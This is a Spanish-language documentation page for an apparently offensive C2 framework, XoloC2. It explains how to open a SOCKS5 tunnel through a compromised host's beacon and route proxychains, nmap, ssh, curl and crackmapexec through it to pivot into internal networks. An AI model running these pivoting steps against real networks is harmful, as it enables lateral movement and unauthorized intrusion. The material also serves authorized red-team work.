Ir al contenido

Túnel SOCKS5

Los beacons de XoloC2 incluyen un proxy SOCKS5 integrado. El tráfico se multiplexa sobre el canal de polling HTTPS existente — no se necesitan binarios adicionales en el objetivo.

En el panel de sesión, haz clic en Túnel SOCKS5, establece un puerto local (por defecto 1080) y haz clic en Iniciar.

O envía directamente en la terminal:

__tunnel__ 1080

Esto abre un listener SOCKS5 en el puerto 1080 de tu servidor XoloC2.

Edita /etc/proxychains4.conf:

[ProxyList]
socks5 127.0.0.1 1080

Paso 3 — Enrutar tus herramientas a través del túnel

Sección titulada «Paso 3 — Enrutar tus herramientas a través del túnel»
Ventana de terminal
# Escaneo de red
proxychains4 nmap -sT -Pn 192.168.1.0/24
# Petición HTTP a host interno
proxychains4 curl http://192.168.1.10/
# SSH a host interno
proxychains4 ssh usuario@192.168.1.10
# Enumeración SMB
proxychains4 crackmapexec smb 192.168.1.0/24
__tunnel__ stop

O haz clic en Detener en el panel de sesión.

Ejecuta túneles simultáneos en diferentes puertos desde diferentes sesiones:

# Sesión A — primer pivot
__tunnel__ 1080
# Sesión B — pivot más profundo
__tunnel__ 1081
  • UDP no está soportado
  • Todos los protocolos TCP funcionan: HTTP, SSH, SMB, RDP, etc.
  • El túnel sobrevive los ciclos de sleep del beacon — el tráfico se encola y se reanuda en el próximo poll